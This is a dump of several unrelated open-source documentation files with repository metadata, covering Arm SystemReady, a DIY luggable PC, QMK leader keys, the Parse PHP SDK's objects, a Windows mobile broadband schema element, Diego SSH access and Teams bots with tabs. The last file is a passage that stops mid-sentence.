m-lab/m-lab.github.io```
61.163934
592
0.761726
eng_Latn
0.995909
5383176e25bb66753cd915db8e86e61fb9861e18
4,121
md
Markdown
README.md
stuyoder/arm-systemready
b2453522018250f2f0fd02242abca1355b2350b5
[ "Apache-2.0" ]
null
null
null
README.md
stuyoder/arm-systemready
b2453522018250f2f0fd02242abca1355b2350b5
[ "Apache-2.0" ]
null
null
null
README.md
stuyoder/arm-systemready
b2453522018250f2f0fd02242abca1355b2350b5
[ "Apache-2.0" ]
1
2021-09-16T16:19:26.000Z
2021-09-16T16:19:26.000Z
# Arm SystemReady ACS ## Introduction to Arm SystemReady Systems that are designed to just work for the end user with the ability to install and run generic, off-the-shelf operating systems out of the box, must follow a set of minimum hardware and firmware requirements. For the Arm ecosystem, this requirement first surfaced in the server segment. The Arm ServerReady compliance certification program provides this “just works” solution for servers, allowing you to deploy Arm servers with confidence. The program is based on industry standards and is accompanied by a compliance test suite, and a process for certification. The Arm SystemReady program is a natural extension of the Arm ServerReady program. Different market segments may target different sets of operating systems and hypervisors with different hardware and firmware requirements. We use the term band to identify these differences, with a shorthand notation for each band. The bands are: * [SystemReady SR](https://developer.arm.com/architectures/system-architectures/arm-systemready/sr) * [SystemReady LS](https://developer.arm.com/architectures/system-architectures/arm-systemready/ls) * [SystemReady ES](https://developer.arm.com/architectures/system-architectures/arm-systemready/es) * [SystemReady IR](https://developer.arm.com/architectures/system-architectures/arm-systemready/ir) For more information, visit: [Arm SystemReady](https://developer.arm.com/architectures/system-architectures/arm-systemready) This repository contains the infrastructure to build the Architecture Compliance Suite and the bootable prebuilt images to be used for the certifications of various bands of SystemReady. Note: Currently SystemReady ES and IR bands are supported in this repository For SystemReady SR, refer to the [Arm Enterprise ACS repository](https://github.com/ARM-software/arm-enterprise-acs) ## System Ready bands: Navigate to the ES or IR band for further details on specific scripts and prebuilt images, through the directories below: * [ES](./ES) * [IR](./IR) ## SystemReady Security Interface Extension: The SystemReady Security Interface Extension certifies that firmware meets the requirements specified by the Arm [Base Boot Security Requirements specification](https://developer.arm.com/documentation/den0107/latest) (BBSR). The Security Interface Extension is optionally applicable to SystemReady SR, ES and IR bands, but not the LS band. Further details on Security Interface Extension, including pre-built images, are here: * [Security Interface Extension](https://github.com/ARM-software/arm-systemready/tree/security-interface-extension-acs/security-interface-extension) ## Limitations Validating the compliance of certain PCIe rules defined in the BSA specification require the PCIe end-point generate specific stimulus during the runtime of the test. Examples of such stimulus are P2P, PASID, ATC, etc. The tests that requires these stimuli are grouped together in the exerciser module. The exerciser layer is an abstraction layer that enables the integration of hardware capable of generating such stimuli to the test framework. The details of the hardware or Verification IP which enable these exerciser tests platform specific and are beyond the scope of this document. The Live image does not allow customizations, hence, the exerciser module is not included in the Live image. To enable exerciser tests for greater coverage of PCIe rules, please refer to [BSA](https://github.com/ARM-software/bsa-acs) Or contact your Arm representative for details. ## License Arm SystemReady ACS is distributed under Apache v2.0 License. ## Feedback, contributions, and support - For feedback, use the GitHub Issue Tracker that is associated with this repository. - For support, send an email to "[email protected]" with details. - Arm licensees can contact Arm directly through their partner managers. - Arm welcomes code contributions through GitHub pull requests. -------------- *Copyright (c) 2021, Arm Limited and Contributors. All rights reserved.*
77.754717
447
0.796651
eng_Latn
0.990492
53831e35f9faa3fd52280e64a568c39b3241bceb
1,135
md
Markdown
content/project-blog/luggable/index.md
dfirebaugh/dustinfirebaugh.com
44c9ea95b3c4f78b31569de3299920036a1caa00
[ "MIT" ]
null
null
null
content/project-blog/luggable/index.md
dfirebaugh/dustinfirebaugh.com
44c9ea95b3c4f78b31569de3299920036a1caa00
[ "MIT" ]
2
2020-10-14T00:42:34.000Z
2021-11-16T14:45:29.000Z
content/project-blog/luggable/index.md
dfirebaugh/dustinfirebaugh.com
44c9ea95b3c4f78b31569de3299920036a1caa00
[ "MIT" ]
1
2020-10-14T16:48:21.000Z
2020-10-14T16:48:21.000Z
--- path: '/luggable' date: '2020-01-23' title: 'Luggable Computer' tags: ['Luggable Computer', 'computer', 'diy'] excerpt: 'The computer that you can lug-around' --- ![luggable3 pc](./images/luggable3.jpg) [Luggables](https://en.wikipedia.org/wiki/Portable_computer) are entirely a thing of the past. My current work laptop is thinner than most of my writing utensiles. Everyonce and a while I get a strange urge to put a computer in something. Sometimes you find yourself in [harbor freight](https://www.harborfreight.com/), a magical place, and you come across an aisle of cheap yet majestic computer cases. I mean, luggage... This was a fun project. I 3D printed some small standoffs to hold the micro-itx motherboard upand cut a few holes in the side of the case. The hard drive was enclosed underneath the mother board and the powersupply was glued down (not proud of this -- haha). There was no elegant solution for storage for peripherals (keyboard, mouse, or monitor), but it made for fun hauling around to coffee shops and coworking spaces! ![luggable pc](./images/luggable.jpg) ![luggable2 pc](./images/luggable2.jpg)
54.047619
258
0.760352
eng_Latn
0.996543
538358a6b2a6a6598de2a45592527eb18212284b
4,431
md
Markdown
docs/ja/feature_leader_key.md
fzf/qmk_toolbox
10d6b425bd24b45002555022baf16fb11254118b
[ "MIT" ]
null
null
null
docs/ja/feature_leader_key.md
fzf/qmk_toolbox
10d6b425bd24b45002555022baf16fb11254118b
[ "MIT" ]
null
null
null
docs/ja/feature_leader_key.md
fzf/qmk_toolbox
10d6b425bd24b45002555022baf16fb11254118b
[ "MIT" ]
null
null
null
# リーダーキー: 新しい種類のモディファイア <!--- original document: 0.8.134:docs/feature_leader_key.md git diff 0.8.134 HEAD -- docs/feature_leader_key.md | cat --> もしあなたが Vim を使ったことがある場合、リーダーキーは何であるかを知っています。そうでなければ、素晴らしい概念を発見しようとしています。:) 例えば、Alt+Shift+W を押す(3つのキーを同時に押す)代わりに、キーの_シーケンス_を押すことができたらどうでしょう?つまり、特別なモディファイア (リーダーキー)を押して、続けて W と C を押すと (単純にキーを高速に繋げます)、何かが起こります。 それが `KC_LEAD` の機能です。以下は例です: 1. リーダーキーとして使いたいキーボードのキーを選択します。それにキーコード `KC_LEAD` を割り当てます。このキーはこのためだけの専用です -- 単一アクションのキーで、他の用途には使うことができません。 2. `config.h` に `#define LEADER_TIMEOUT 300` という行を追加します。これによって `KC_LEAD` キーのタイムアウトを設定します。具体的には、`KC_LEAD` キーを押してからリーダーキーのシーケンスを完了するまで一定の時間しかありません。ここでの `300` はそれを300msに設定します。この値を増やして、シーケンスを入力する時間を増やすことができます。ただし、この時間中に押されたキーは全て途中で遮られ、送信されません。そのためこの値は小さくしておいたほうが良いかもしれません。 * デフォルトでは、このタイムアウトは、`KC_LEAD` を押してからシーケンス全体が完了するまでに掛かる時間です。これは一部の人にとっては非常に短いかもしれません。そのため、このタイムアウトを増やしたほうが良い場合もあります。必要に応じて、`LEADER_PER_KEY_TIMING` オプションを有効にしたほうが良い場合もあります。これは各キーがタップされる度にタイムアウトまでの時間をリセットする機能です。これにより、タイムアウト時間を短くしつつも、比較的長いシーケンスを使うことができます。このオプションを有効にするには、`config.h` に `#define LEADER_PER_KEY_TIMING` を追加します。 3. `matrix_scan_user` 関数の中で、以下のようなものを追加します: ```c LEADER_EXTERNS(); void matrix_scan_user(void) { LEADER_DICTIONARY() { leading = false; leader_end(); SEQ_ONE_KEY(KC_F) { // マクロ内でできること SEND_STRING("QMK is awesome."); } SEQ_TWO_KEYS(KC_D, KC_D) { SEND_STRING(SS_LCTL("a") SS_LCTL("c")); } SEQ_THREE_KEYS(KC_D, KC_D, KC_S) { SEND_STRING("https://start.duckduckgo.com\n"); } SEQ_TWO_KEYS(KC_A, KC_S) { register_code(KC_LGUI); register_code(KC_S); unregister_code(KC_S); unregister_code(KC_LGUI); } } } ``` ご覧のとおり、幾つかの関数があります。`SEQ_ONE_KEY` を単一キーシーケンス (リーダーの後に1つのキーのみ)に使い、より長いシーケンスについては `SEQ_TWO_KEYS`、`SEQ_THREE_KEYS` から `SEQ_FIVE_KEYS` を使うことができます。 これらはそれぞれ1つ以上のキーコードを引数として受け付けます。これは重要な点です: **キーボードの任意のレイヤー**のキーコードを使うことができます。当たり前ですが、リーダーマクロが発動するにはそのレイヤーがアクティブである必要があります ## `rules.mk` にリーダーキーサポートを追加 リーダーキーのサポートを追加するには、単純にキーマップの `rules.mk` に1行を追加します: ```make LEADER_ENABLE = yes ``` ## リーダーキーのキーごとのタイミング 長いリーダーキー文字列のためや 200wpm のタイピングスキルが無い場合に、非常に長いタイムアウト時間に頼るのではなく、キーを押すごとに入力を完了するまでの時間を増やす機能を使用することができます。これは、リーダーキーを使ってタップダンスを再現する場合に非常に役立ちます (C, C, C のような同じキーを複数回タップする場合)。 これを有効にするには、以下を `config.h` に配置します: ```c #define LEADER_PER_KEY_TIMING ``` この後、`LEADER_TIMEOUT` を 300ms 未満に下げることをお勧めします。 ```c #define LEADER_TIMEOUT 250 ``` これで、リーダーキーのタイムアウト時間を 1000ms に設定することなく以下のようなことが可能になると思われます。 ```c SEQ_THREE_KEYS(KC_C, KC_C, KC_C) { SEND_STRING("Per key timing is great!!!"); } ``` ## 厳密なキー処理 デフォルトでは、リーダーキー機能は、リーダーシーケンスの確認時に [`モッドタップ`](ja/mod_tap.md) および [`レイヤータップ`](ja/feature_layers.md#switching-and-toggling-layers) 機能からのキーコードをフィルターします。つまり、`LT(3, KC_A)` を使っている場合、`LT(3, KC_A)` ではなくシーケンスの `KC_A` として取り出され、新しいユーザにとってより期待される動作を提供します。 ほとんどの場合これで問題ありませんが、シーケンスでキーコード全体(例えば、上の例での `LT(3, KC_A)`) を指定したい場合は、`config.h` ファイルに `#define LEADER_KEY_STRICT_KEY_PROCESSING` を追加することこのような機能を有効にすることができます。これでフィルタリングが無効になり、キーコード全体を指定する必要があります。 ## カスタマイズ リーダーキー機能には、リーダーキー機能の動作にいくらかのカスタマイズを追加する方法があります。リーダーキー機能のプロセスの特定の部分で呼び出すことができる2つの関数、`leader_start()` と `leader_end()` です。 `KC_LEAD` キーがタップされた時に `leader_start()` 関数が呼ばれ、リーダーシーケンスが完了するか、リーダータイムアウトの時間に達した時に `leader_end()` 関数が呼ばれます。 リーダーシーケンスにフィードバック(ビープまたは音楽を再生するなど)を追加するために、これらの関数をコード (通常 は`keymap.c`)に追加することができます。 ```c void leader_start(void) { // シーケンスの開始 } void leader_end(void) { // シーケンスの終了 (成功しない/失敗を検知) } ``` ### 例 この例では、リーダーシーケンスを開始するために `KC_LEAD` を押すとマリオの "One Up" 音が再生され、正常に完了した場合は "All Star" が再生され、失敗した場合は "Rick Roll" を再生されます。 ```c bool did_leader_succeed; #ifdef AUDIO_ENABLE float leader_start[][2] = SONG(ONE_UP_SOUND ); float leader_succeed[][2] = SONG(ALL_STAR); float leader_fail[][2] = SONG(RICK_ROLL); #endif LEADER_EXTERNS(); void matrix_scan_user(void) { LEADER_DICTIONARY() { did_leader_succeed = leading = false; SEQ_ONE_KEY(KC_E) { // マクロ内でできること SEND_STRING(SS_LCTL(SS_LSFT("t"))); did_leader_succeed = true; } else SEQ_TWO_KEYS(KC_E, KC_D) { SEND_STRING(SS_LGUI("r") "cmd\n" SS_LCTL("c")); did_leader_succeed = true; } leader_end(); } } void leader_start(void) { #ifdef AUDIO_ENABLE PLAY_SONG(leader_start); #endif } void leader_end(void) { if (did_leader_succeed) { #ifdef AUDIO_ENABLE PLAY_SONG(leader_succeed); #endif } else { #ifdef AUDIO_ENABLE PLAY_SONG(leader_fail); #endif } } ```
29.151316
322
0.760099
yue_Hant
0.694899
53835a793ac0642394b8eefd8254e58af5ca81af
2,354
md
Markdown
winrt-related-src/schemas/mobilebroadbandschema/wwan/element-activationmethod.md
huzaifa-d/winrt-related
11c383f23efe346508b2f8adcd1f49530eb7297d
[ "CC-BY-4.0", "MIT" ]
null
null
null
winrt-related-src/schemas/mobilebroadbandschema/wwan/element-activationmethod.md
huzaifa-d/winrt-related
11c383f23efe346508b2f8adcd1f49530eb7297d
[ "CC-BY-4.0", "MIT" ]
null
null
null
winrt-related-src/schemas/mobilebroadbandschema/wwan/element-activationmethod.md
huzaifa-d/winrt-related
11c383f23efe346508b2f8adcd1f49530eb7297d
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- description: Defines the abstract base element for ReconnectToNetwork, ReregisterToNetwork, and ServiceActivation. Search.Product: eADQiWindows 10XVcnh title: ActivationMethod ms.assetid: bd57da53-5b6a-47e7-a240-5e300ad9d133 keywords: windows 10, uwp, schema, mobile broadband schema ms.topic: reference ms.date: 04/05/2017 --- # ActivationMethod Defines the abstract base element for [**ReconnectToNetwork**](element-reconnecttonetwork.md), [**ReregisterToNetwork**](element-reregistertonetwork.md), and [**ServiceActivation**](element-serviceactivation.md). ## Element hierarchy **&lt;ActivationMethod&gt;** ## Syntax ``` syntax <ActivationMethod Delay? = P[n]Y[n]M[n]DT[n]H[n]M[n]S duration : "PT0S" RetryCount? = positive integer : "0" RetryInterval? = P[n]Y[n]M[n]DT[n]H[n]M[n]S duration : "PT1M" /> ``` ### Key `?`   optional (zero or one) `:`   default value ## Attributes and Elements ### Attributes <table> <colgroup> <col width="20%" /> <col width="20%" /> <col width="20%" /> <col width="20%" /> <col width="20%" /> </colgroup> <thead> <tr class="header"> <th>Attribute</th> <th>Description</th> <th>Data type</th> <th>Required</th> <th>Default value</th> </tr> </thead> <tbody> <tr class="odd"> <td><strong>Delay</strong></td> <td><p>Defines the time until the next activation attempt. Duration time format is defined by <a href="https://www.iso.org/iso/catalogue_detail?csnumber=40874">ISO 8601</a> .</p></td> <td>P[n]Y[n]M[n]DT[n]H[n]M[n]S duration</td> <td>No</td> <td>PT0S</td> </tr> <tr class="even"> <td><strong>RetryCount</strong></td> <td><p>Defines the number of activation attempts.</p></td> <td>positive integer</td> <td>No</td> <td>0</td> </tr> <tr class="odd"> <td><strong>RetryInterval</strong></td> <td><p>Defines the time between activation attempts. Duration time format is defined by <a href="https://www.iso.org/iso/catalogue_detail?csnumber=40874">ISO 8601</a> .</p></td> <td>P[n]Y[n]M[n]DT[n]H[n]M[n]S duration</td> <td>No</td> <td>PT1M</td> </tr> </tbody> </table>   ### Child Elements None. ### Parent Elements This outermost (document) element may not be contained by any other elements. ## Requirements | | | |----------|--------------| | **Namespace** | `http://www.microsoft.com/networking/CarrierControl/WWAN/v1` |    
22.634615
212
0.661852
eng_Latn
0.479942
53835bf400c15a864c56b8f6da5877dbdd04a8fa
14,410
md
Markdown
_includes/php/objects.md
Wouter125/docs
71fa7885cf6444b20d82deeaa2e73d046c87350f
[ "BSD-3-Clause" ]
1
2021-03-05T05:12:25.000Z
2021-03-05T05:12:25.000Z
_includes/php/objects.md
Wouter125/docs
71fa7885cf6444b20d82deeaa2e73d046c87350f
[ "BSD-3-Clause" ]
null
null
null
_includes/php/objects.md
Wouter125/docs
71fa7885cf6444b20d82deeaa2e73d046c87350f
[ "BSD-3-Clause" ]
null
null
null
# Objects ## ParseObject Storing data on Parse is built around the `ParseObject`. Each `ParseObject` contains key-value pairs of JSON-compatible data. This data is schemaless, which means that you don't need to specify ahead of time what keys exist on each `ParseObject`. You simply set whatever key-value pairs you want, and our backend will store it. For example, let's say you're tracking high scores for a game. A single `ParseObject` could contain: ```php score: 1337, playerName: "Sean Plott", cheatMode: false ``` Keys must be alphanumeric strings. Values can be strings, numbers, booleans, or even sequential arrays and associative arrays - anything that can be JSON-encoded. Note however that Arrays and Associative Arrays require separate methods to set them on a `ParseObject`. ## Saving Objects Let's say you want to save the `GameScore` described above to the Parse Cloud. The interface is similar to a our other SDKs, including the `save` method: ```php $gameScore = new ParseObject("GameScore"); $gameScore->set("score", 1337); $gameScore->set("playerName", "Sean Plott"); $gameScore->set("cheatMode", false); try { $gameScore->save(); echo 'New object created with objectId: ' . $gameScore->getObjectId(); } catch (ParseException $ex) { // Execute any logic that should take place if the save fails. // error is a ParseException object with an error code and message. echo 'Failed to create new object, with error message: ' . $ex->getMessage(); } ``` After this code runs, you will probably be wondering if anything really happened. To make sure the data was saved, you can look at the Data Browser in your app on Parse. You should see something like this: ```json objectId: "xWMyZ4YEGZ", score: 1337, playerName: "Sean Plott", cheatMode: false, createdAt:"2011-06-10T18:33:42Z", updatedAt:"2011-06-10T18:33:42Z" ``` There are two things to note here. You didn't have to configure or set up a new Class called `GameScore` before running this code. Your Parse app lazily creates this Class for you when it first encounters it. There are also a few fields you don't need to specify that are provided as a convenience. `objectId` is a unique identifier for each saved object. `createdAt` and `updatedAt` represent the time that each object was created and last modified in the cloud. Each of these fields is filled in by Parse, so they don't exist on a `ParseObject` until a save operation has completed. ## Retrieving Objects Saving data to the cloud is fun, but it's even more fun to get that data out again. If the `ParseObject` has been uploaded to the server, you can retrieve it with its `objectId` using a `ParseQuery`: ```php $query = new ParseQuery("GameScore"); try { $gameScore = $query->get("xWMyZ4YEGZ"); // The object was retrieved successfully. } catch (ParseException $ex) { // The object was not retrieved successfully. // error is a ParseException with an error code and message. } ``` To get the values out of the `ParseObject`, use the `get` method. ```php $score = $gameScore->get("score"); $playerName = $gameScore->get("playerName"); $cheatMode = $gameScore->get("cheatMode"); ``` The four special values are provided as the result of methods: ```php $objectId = $gameScore->getObjectId(); $updatedAt = $gameScore->getUpdatedAt(); $createdAt = $gameScore->getCreatedAt(); $acl = $gameScore->getACL(); ``` If you need to refresh an object you already have with the latest data that is in the Parse Cloud, you can call the `fetch` method like so: ```php $gameScore->fetch(); ``` If you need to check if an object has been fetched, you can call the `isDataAvailable()` method: ```php if (!$gameScore->isDataAvailable()) { $gameScore->fetch(); } ``` ## Updating Objects Updating an object is simple. Just set some new data on it and call the save method. For example: ```php // Create the object. $gameScore = new ParseObject("GameScore"); $gameScore->set("score", 1337); $gameScore->set("playerName", "Sean Plott"); $gameScore->set("cheatMode", false); $gameScore->setArray("skills", ["pwnage", "flying"]); $gameScore->save(); // Now let's update it with some new data. In this case, only cheatMode and score // will get sent to the cloud. playerName hasn't changed. $gameScore->set("cheatMode", true); $gameScore->set("score", 1338); $gameScore->save(); ``` Parse automatically figures out which data has changed so only "dirty" fields will be sent to the Parse Cloud. You don't need to worry about squashing data that you didn't intend to update. ### Counters The above example contains a common use case. The "score" field is a counter that we'll need to continually update with the player's latest score. Using the above method works but it's cumbersome and can lead to problems if you have multiple clients trying to update the same counter. To help with storing counter-type data, Parse provides methods that atomically increment (or decrement) any number field. So, the same update can be rewritten as: ```php $gameScore->increment("score"); $gameScore->save(); ``` You can also increment by any amount by passing in a second argument to `increment`. When no amount is specified, 1 is used by default. ### Arrays To help with storing array data, there are three operations that can be used to atomically change an array associated with a given key: * `add` append the given object to the end of an array field. * `addUnique` add the given object only if it isn't already contained in an array field. The position of the insert is not guaranteed. * `remove` remove all instances of the given object from an array field. For example, we can add items to the set-like "skills" field like so: ```php $gameScore->addUnique("skills", ["flying"]); $gameScore->addUnique("skills", ["kungfu"]); $gameScore->save(); ``` Note that it is not currently possible to atomically add and remove items from an array in the same save. You will have to call `save` in between every different kind of array operation. ## Encoding/Decoding Using version **1.3.0** or later of the php sdk gives you the ability to encode/decode instances of `ParseObject`. Encoding an object will give you a JSON encoded array that can be later decoded to get the original object back, unsaved changes included. ```php // create an object $obj = new ParseObject("YourClass"); $obj->set('info', 'an encodable object'); // encode this object $encoded = $obj->encode(); // save this encoded object somewhere for later use... // decode to get our object as it was before, // unsaved changes included $decoded = ParseObject::decode($encoded); ``` An object that is encoded can easily be stored away, sent across the wire or even saved as a value under another `ParseObject`. This can be used to create a snapshot of an object at a point in time (unsaved changes included), allowing you to later go back, decode and inspect that object later on. ## Destroying Objects To delete an object from the cloud: ```php $gameScore->destroy(); ``` You can delete a single field from an object with the `delete` method: ```php // After this, the playerName field will be empty $gameScore->delete("playerName"); // Saves the field deletion to the Parse Cloud $gameScore->save(); ``` ## Relational Data Objects may have relationships with other objects. For example, in a blogging application, a `Post` object may have many `Comment` objects. Parse supports all kind of relationships, including one-to-one, one-to-many, and many-to-many. ### One-to-One and One-to-Many Relationships One-to-one and one-to-many relationships are modeled by saving a `ParseObject` as a value in the other object. For example, each `Comment` in a blogging app might correspond to one `Post`. To create a new `Post` with a single `Comment`, you could write: ```php // Create the post $myPost = new ParseObject("Post"); $myPost->set("title", "I'm Hungry"); $myPost->set("content", "Where should we go for lunch?"); // Create the comment $myComment = new ParseObject("Comment"); $myComment->set("content", "Let's do Sushirrito."); // Add the post as a value in the comment $myComment->set("parent", $myPost); // This will save both myPost and myComment $myComment->save(); ``` Internally, the Parse framework will store the referred-to object in just one place, to maintain consistency. You can also link objects using just their `objectId`s like so: ```php $post = new ParseObject("Post", "1zEcyElZ80"); $myComment->set("parent", $post); ``` By default, when fetching an object, related `ParseObject`s are not fetched. These objects' values cannot be retrieved until they have been fetched like so: ```php $post = $fetchedComment->get("parent"); $post->fetch(); $title = $post->get("title"); ``` ### Many-to-Many Relationships Many-to-many relationships are modeled using `ParseRelation`. This works similar to storing an array of `ParseObject`s in a key, except that you don't need to fetch all of the objects in a relation at once. In addition, this allows `ParseRelation` to scale to many more objects than the array of `ParseObject` approach. For example, a `User` may have many `Posts` that she might like. In this case, you can store the set of `Posts` that a `User` likes using `relation`. In order to add a `Post` to the "likes" array of the `User`, you can do: ```php $user = ParseUser::getCurrentUser(); $relation = $user->getRelation("likes"); $relation->add($post); $user->save(); ``` You can remove a post from a `ParseRelation`: ```php $relation->remove($post); $user->save(); ``` You can call `add` and `remove` multiple times before calling save: ```php $relation->remove($post1); $relation->remove($post2); $user->save(); ``` You can also pass in an array of `ParseObject` to `add` and `remove`: ```php $relation->add([$post1, $post2, $post3]); $user->save(); ``` By default, the array of objects in this relation are not downloaded. You can get an array of the posts that a user likes by using the `ParseQuery` returned by `getQuery`. The code looks like: ```php $postsLiked = $relation->getQuery()->find(); // $postsLiked contains the posts that the current user likes. ``` If you want only a subset of the Posts, you can add extra constraints to the `ParseQuery` returned by query like this: ```php $query = $relation->getQuery(); $query->equalTo("title", "I'm Hungry"); $postsLiked = $query->find(); // $postsLiked contains post liked by the current user which have the title "I'm Hungry". ``` For more details on `ParseQuery`, please look at the query portion of this guide. A `ParseRelation` behaves similar to an array of `ParseObject` for querying purposes, so any query you can do on an array of objects, you can do on a `ParseRelation`. ## Data Types So far we've used values with type `String`, `Integer`, and `ParseObject`. Parse also supports PHP `DateTime`s and `null`. You can nest PHP arrays and associative arrays (JSON Objects) to store more structured data within a single `ParseObject`. Overall, the following types are allowed for each field in your object: * String => `String` * Number => `Integer` and `float` * Bool => `Boolean` * Array => PHP arrays * Object => associative arrays (JSON Objects) * Date => `DateTime` * File => `ParseFile` * Pointer => other `ParseObject` * Relation => `ParseRelation` * GeoPoint => `ParseGeoPoint` * Null => `null` Some examples: ```php $number = 42; $string = "the number is " . $number; $date = new DateTime(); $array = [$string, $number]; $object = ["number" => $number, "string" => $string]; $geoPoint = new ParseGeoPoint(37.75, -122.68); // san fran $bigObject = new ParseObject("BigObject"); $bigObject->set("myNumber", $number); $bigObject->set("myString", $string); $bigObject->set("myDate", $date); $bigObject->setArray("myArray", $array); $bigObject->setAssociativeArray("myObject", $object); $bigObject->set("myGeoPoint", $geoPoint); $bigObject->set("anyKey", null); // this value can only be saved to an existing key $bigObject->save(); ``` We do not recommend storing large pieces of binary data like images or documents on `ParseObject`. `ParseObject`s should not exceed 128 kilobytes in size. We recommend you use `ParseFile`s to store images, documents, and other types of files. You can do so by instantiating a `ParseFile` object and setting it on a field. See [Files](#files) for more details. For more information about how Parse handles data, check out our documentation on [Data](#data). ## Subclassing ParseObject Each `ParseObject` is an instance of a specific subclass with a class name that you can use to distinguish different sorts of data. For example, we could call the high score object a `GameScore`. We recommend that you NameYourClassesLikeThis and nameYourKeysLikeThis, just to keep your code looking pretty. To create a new subclass, create a new class which extends the `ParseObject` class, add the `$parseClassName` static property, and call the `registerSubclass` method before use. Any `ParseQuery` will return instances of the new class for any `ParseObject` with the same class name. ```php class GameScore extends ParseObject { public static $parseClassName = "GameScore"; } ``` ```php // Do this once, at the start of your app, before ParseClient::initialize(...); GameScore::registerSubclass(); // Create a new instance of that class. $gameScore = new GameScore(); ``` You can add additional methods and properties to your subclasses of `ParseObject`. ```php // A complex subclass of ParseObject class Monster extends ParseObject { public static $parseClassName = "Monster"; public function hasSuperHumanStrength() { return $this->get("strength") > 18; } public static function spawn($strength) { $monster = new Monster(); $monster->set("strength", $strength); return $monster; } } ``` ```php $monster = Monster::spawn(200); echo monster->strength(); // Displays 200. echo monster->hasSuperHumanStrength(); // Displays true. ``` If you want to override the __construct method, make sure the first three params are exactly as same as the parent ParseObject constructor: ```php class GameScore extends ParseObject { public static $parseClassName = "GameScore"; public function __construct($className = null, $objectId = null, $isPointer = false, $another_param) { parent::__construct("GameScore", $objectId, $isPointer); // ... } } ```
37.428571
545
0.729146
eng_Latn
0.991769
53836407344f44ea2411dd857d20af8356338a9a
104
md
Markdown
README.md
Aevit/SCScreenshot
23d11a08bed7cf549d0d53f24b5e96f573145df8
[ "MIT" ]
2
2016-07-03T15:48:09.000Z
2017-02-17T08:42:09.000Z
README.md
Aevit/SCScreenshot
23d11a08bed7cf549d0d53f24b5e96f573145df8
[ "MIT" ]
null
null
null
README.md
Aevit/SCScreenshot
23d11a08bed7cf549d0d53f24b5e96f573145df8
[ "MIT" ]
null
null
null
# SCScreenshot find all the screenshots in the album and put them into a new album called "screenshots"
34.666667
88
0.798077
eng_Latn
0.999537
5383dff397b5b0030b39a7c7131135d7630ba9d2
582
md
Markdown
ssh-access-and-policy.md
Rajpratik71/diego-design-notes
cf628cede60ae46fbaf371db38ed1ea25914f045
[ "Apache-2.0" ]
70
2015-01-22T16:23:26.000Z
2016-05-27T03:42:35.000Z
ssh-access-and-policy.md
Rajpratik71/diego-design-notes
cf628cede60ae46fbaf371db38ed1ea25914f045
[ "Apache-2.0" ]
20
2015-01-08T17:51:23.000Z
2016-03-29T07:35:22.000Z
ssh-access-and-policy.md
isabella232/diego-design-notes
cf36be42163fdd2c6c25995e16c8b03e0fbc0ab1
[ "Apache-2.0" ]
41
2015-01-08T10:15:14.000Z
2016-05-18T02:34:06.000Z
# SSH Access and Policy Up-to-date documentation about the SSH features of Diego can be found in the CF Documentation: - Developers accessing their applications and service instances over SSH shoud consult "[Accessing Apps with SSH](http://docs.cloudfoundry.org/devguide/deploy-apps/ssh-apps.html)" and "[Accessing Services with SSH](http://docs.cloudfoundry.org/devguide/deploy-apps/ssh-services.html)". - Operators configuring SSH access in their CF and Diego deployment manifests should consult "[Configuring SSH Access](http://docs.cloudfoundry.org/running/config-ssh.html)".
83.142857
285
0.798969
eng_Latn
0.700575
538470cf8cb6f15949eafb604306cf99d537c177
4,329
md
Markdown
msteams-platform/resources/bot-v3/bots-with-tabs.md
isabella232/msteams-docs.es-ES
a5abd8a27d657bc325eb3f5e19e2ff0d1059f235
[ "CC-BY-4.0", "MIT" ]
null
null
null
msteams-platform/resources/bot-v3/bots-with-tabs.md
isabella232/msteams-docs.es-ES
a5abd8a27d657bc325eb3f5e19e2ff0d1059f235
[ "CC-BY-4.0", "MIT" ]
1
2021-02-23T19:09:10.000Z
2021-02-23T19:09:10.000Z
msteams-platform/resources/bot-v3/bots-with-tabs.md
isabella232/msteams-docs.es-ES
a5abd8a27d657bc325eb3f5e19e2ff0d1059f235
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Combinar bots con pestañas description: Describe cómo usar fichas y bots juntos keywords: desarrollo de pestañas de Microsoft Teams ms.date: 03/15/2018 ms.openlocfilehash: 59ae8bc01f82c70dd7ea6869cb870e26acae1293 ms.sourcegitcommit: 4329a94918263c85d6c65ff401f571556b80307b ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 02/01/2020 ms.locfileid: "41676005" --- # <a name="combine-bots-with-tabs"></a>Combinar bots con pestañas [!include[v3-to-v4-SDK-pointer](~/includes/v3-to-v4-pointer-bots.md)] Los bots y las pestañas funcionan bien juntos y, a menudo, se combinan en un único servicio back-end. En esta sección se describen los procedimientos recomendados y los patrones comunes para usar fichas y bots juntos. ## <a name="associating-user-identities-across-bot-and-tab"></a>Asociación de identidades de usuario en el bot y la ficha Por ejemplo: Supongamos que la aplicación de pestaña usa un sistema de identificación de propietario para proteger su contenido. Supongamos que también tiene un bot que puede interactuar con el usuario. Normalmente, querrá Mostrar contenido en la pestaña que es específico del usuario de visualización. El desafío es que el identificador de usuario del sistema es probablemente diferente del identificador de usuario de Microsoft Teams. ¿Cómo se asocian estas dos identidades? En general, el enfoque recomendado es iniciar sesión del usuario con el bot usando el mismo sistema de identidad usado para proporcionar autenticación para el contenido de la pestaña. Puede implementar esto mediante la acción de inicio de sesión, que normalmente se registra en el usuario a través de un flujo de OAuth. Este flujo funciona mejor si el proveedor de identidades implementa el protocolo OAuth 2,0. A continuación, puede asociar el identificador de usuario de Teams a las credenciales del usuario desde su propio servicio de identidad. ![Asociar identidades](~/assets/images/bots/associating_contexts.png) ## <a name="constructing-deep-links-to-tabs-in-messages-from-your-bot"></a>Creación de vínculos profundos a pestañas en los mensajes de su bot Es posible que desee usar pestañas para mostrar más contenido del que cabe dentro de una tarjeta o proporcionar una forma de completar tareas complejas de rellenado de formularios mediante el lienzo de tabulación. Por ejemplo, considere la posibilidad de navegar por el usuario a la pestaña cuando haga clic en la tarjeta de su bot. Para que esto suceda, deberá codificar el mensaje del bot para incluir una dirección URL de [vínculo profundo](~/concepts/build-and-test/deep-links.md) , ya sea mediante marcado o como destino de la acción openUrl. Los vínculos profundos dependen de una entityId, que es un valor opaco que se asigna a una entidad única en el sistema. Cuando se crea la pestaña, lo ideal es almacenar un estado sencillo (por ejemplo, indicador) en el back-end en el que se indica que la pestaña se ha creado en el canal. Cuando el bot construye un mensaje, puede dirigirse al entityId asociado a esa ficha. **Nota:** en chats personales, dado que las pestañas son "estáticas" y se instalan con la aplicación, siempre puede suponer que existe y, por lo tanto, crear vínculos profundos en 